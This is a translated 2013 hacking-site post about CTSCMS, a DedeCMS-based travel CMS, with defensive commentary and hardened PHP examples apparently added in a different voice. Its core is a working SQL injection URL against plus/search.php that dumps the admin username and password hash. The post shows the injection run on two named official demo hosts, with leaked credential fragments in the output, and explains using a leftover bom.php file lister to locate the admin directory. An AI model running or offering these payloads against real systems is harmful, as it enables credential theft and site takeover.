CTSCMS latest vulnerability (Vulnerability Warning, Black Bar Safety Net)

Author: 佚名 (Anonymous), www.myhack58.com, MYHACK58:62201338596
Published: May 04, 2013

China Travel Service Website Management System (CTSCMS.COM) describes itself as a professional provider of tourism website programs and source code, travel website templates and tourism website construction services, focused on e-commerce development for travel agencies and the tour industry.

Okay~ CTSCMS is in fact built on a DedeCMS (织梦) template, and its own "commercial version" actually sells for around 500 yuan.

Check the update date in

data/admin/ver.txt

It is generally from 2010, so a direct getshell may well be possible too.

exp:

http://www.0day5.com/plus/search.php?keyword=as&typeArr[111%3D@\")+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+%23@__admin+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@"+]=a
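The payload above carries its SQL in the *key* of the `typeArr` array parameter, which PHP's query-string parser turns into `$_GET['typeArr']['<payload>'] = 'a'`; input checks that only look at parameter values never see it. The following is an added illustration of that pattern beside a hardened version, not code from CTSCMS or DedeCMS; the table and column names, and the PDO connection, are assumptions.

```php
<?php
// Added illustration, not CTSCMS or DedeCMS code: how a SQL injection through
// an array *key* (typeArr[<payload>]=a) arises, next to a hardened version.
// Table and column names are assumptions.

// Vulnerable pattern: the keys of $_GET['typeArr'] are concatenated into SQL.
// Filters that only inspect parameter values never see this input.
function buildTypeFilterVulnerable(array $typeArr): string
{
    $ids = [];
    foreach ($typeArr as $id => $v) {
        $ids[] = $id;                       // attacker controls the key, not just $v
    }
    return 'SELECT id FROM content WHERE typeid IN (' . implode(',', $ids) . ')';
}

// Hardened: keys are allow-listed as positive integers and the query is
// parameterised, so nothing from the request reaches the SQL parser as code.
function buildTypeFilterSafe(array $typeArr): array
{
    $ids = [];
    foreach (array_keys($typeArr) as $id) {
        if (!preg_match('/^[1-9][0-9]{0,9}$/', (string) $id)) {
            continue;                       // drop anything that is not a plain id
        }
        $ids[] = (int) $id;
    }
    if ($ids === []) {
        return ['SELECT id FROM content WHERE 0', []];   // no valid ids: match nothing
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    return ["SELECT id FROM content WHERE typeid IN ($placeholders)", $ids];
}

// Constructed request shaped like the payload above: SQL text in the key.
$request = ['111=@") and (select 1 from dual)#' => 'a', '7' => 'a'];

echo buildTypeFilterVulnerable($request), PHP_EOL;  // attacker text lands inside the SQL

[$sql, $params] = buildTypeFilterSafe($request);
echo $sql, ' ', json_encode($params), PHP_EOL;      // only the integer id survives

// With PDO the pair would be run as (connection assumed to exist):
// $stmt = $pdo->prepare($sql); $stmt->execute($params);
```

The allow-list is the important half: casting alone would turn the hostile key into `111` and silently succeed, whereas rejecting non-numeric keys also gives a clean signal to log. In a detection rule, the tell-tale is SQL syntax inside a bracketed parameter name rather than a value.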

The default admin backend address is

http://www.0day5.com/ctscms

Even if you can't find the backend it doesn't matter; while viewing the page source I found something interesting:

bom.php

```php
<?php
// remove the utf-8 boms
// by magicbug at gmail dot com

if (isset($_GET['dir'])) { // config the basedir
    $basedir = $_GET['dir'];        // the caller chooses which directory to walk
} else {
    $basedir = '.';
}
$auto = 1;                          // 1 = strip BOMs in place, not just report them
checkdir($basedir);

function checkdir($basedir) {
    if ($dh = opendir($basedir)) {
        while (($file = readdir($dh)) !== false) {
            if ($file != '.' && $file != '..') {
                if (!is_dir($basedir."/".$file)) {
                    echo "filename: $basedir/$file ";       // every path is echoed to the browser
                    echo checkBOM("$basedir/$file")." <br>";
                } else {
                    $dirname = $basedir."/".$file;
                    checkdir($dirname);                     // recurse into subdirectories
                }
            }
        }
        closedir($dh);
    }
}

function checkBOM($filename) {
    global $auto;
    $contents = file_get_contents($filename);
    $charset[1] = substr($contents, 0, 1);
    $charset[2] = substr($contents, 1, 1);
    $charset[3] = substr($contents, 2, 1);
    // 239 187 191 = EF BB BF, the UTF-8 byte order mark
    if (ord($charset[1]) == 239 && ord($charset[2]) == 187 && ord($charset[3]) == 191) {
        if ($auto == 1) {
            $rest = substr($contents, 3);
            rewrite($filename, $rest);
            return ("<font color=red>BOM found, automatically removed.</font>");
        } else {
            return ("<font color=red>BOM found.</font>");
        }
    }
    else return ("BOM Not Found.");
}

function rewrite($filename, $data) {
    $filenum = fopen($filename, "w");
    flock($filenum, LOCK_EX);
    fwrite($filenum, $data);
    fclose($filenum);
}
?>
```

It lists every file, hey hey~ then you know what to do: when you can't find the backend, just look it up live at

http://www.0day5.com/bom.php


Searching that listing for sys_safe.php directly reveals the admin backend directory.
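The real problem with the leftover bom.php is not the BOM stripping but that a recursive directory walker, with a caller-chosen root and in-place rewrite, sits at a public URL. Below is an added example of the same maintenance job written so it cannot be reached through the web server; it is not the script shipped with CTSCMS, and the script name, the report-only default and the `.php`-only filter are assumptions.

```php
<?php
// Added example, not CTSCMS's bom.php: the same BOM-stripping job as a
// command-line maintenance script. Paths, flags and defaults are assumptions.

declare(strict_types=1);

// Refuse to run under any web SAPI: a tool that walks and rewrites the
// document root belongs in a deploy step, not behind a public URL.
if (PHP_SAPI !== 'cli') {
    http_response_code(404);
    exit;
}

$base  = $argv[1] ?? null;
$apply = in_array('--apply', $argv, true);   // default is report-only
if ($base === null || $base === '--apply') {
    fwrite(STDERR, "usage: php strip_bom.php <dir> [--apply]\n");
    exit(2);
}
$root = realpath($base);
if ($root === false || !is_dir($root)) {
    fwrite(STDERR, "not a directory: $base\n");
    exit(2);
}

const UTF8_BOM = "\xEF\xBB\xBF";   // the EF BB BF sequence the original tests byte by byte

function hasBom(string $path): bool
{
    $fh = fopen($path, 'rb');
    if ($fh === false) {
        return false;
    }
    $head = fread($fh, 3);          // only the first three bytes are needed
    fclose($fh);
    return $head === UTF8_BOM;
}

function stripBom(string $path): void
{
    $contents = file_get_contents($path);
    // LOCK_EX mirrors the original's flock(); a temp file plus rename would be
    // the atomic alternative if readers may race with the rewrite.
    file_put_contents($path, substr($contents, 3), LOCK_EX);
}

$it = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
);
$found = 0;
foreach ($it as $file) {
    /** @var SplFileInfo $file */
    if (!$file->isFile() || $file->getExtension() !== 'php') {
        continue;                   // source files only, never uploads or data files
    }
    $path = $file->getPathname();
    // Stay inside $root even if a symlink inside it points elsewhere.
    if (strpos(realpath($path) ?: '', $root . DIRECTORY_SEPARATOR) !== 0) {
        continue;
    }
    if (!hasBom($path)) {
        continue;
    }
    $found++;
    echo ($apply ? 'stripped: ' : 'has BOM: '), $path, PHP_EOL;   // printed to the operator's terminal only
    if ($apply) {
        stripBom($path);
    }
}
echo "$found file(s) with BOM", PHP_EOL;
```

Run as `php strip_bom.php /var/www/site` to report and `--apply` to rewrite. The SAPI check is the one line that matters for this page: with it, the file contributes nothing to an attacker even if it is accidentally left in the web root, and a `find`-style listing of the site no longer leaks the renamed admin directory.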

On the official demo sites:

http://c.ctscms.com/plus/search.php?keyword=as&typeArr[111%3D@\")+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+%23@__admin+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@"+]=a

Error infos: Duplicate entry '1|ctscms|d7f10e7cca0693eb8561' for key 'group_key'

http://s.ctscms.com/plus/search.php?keyword=as&typeArr[111%3D@\")+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+%23@__admin+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@"+]=a

Error infos: Duplicate entry '1|ctscms|c6364c485d55bb9df83a' for key 'group_key'

Getting a shell from the backend is not explained here~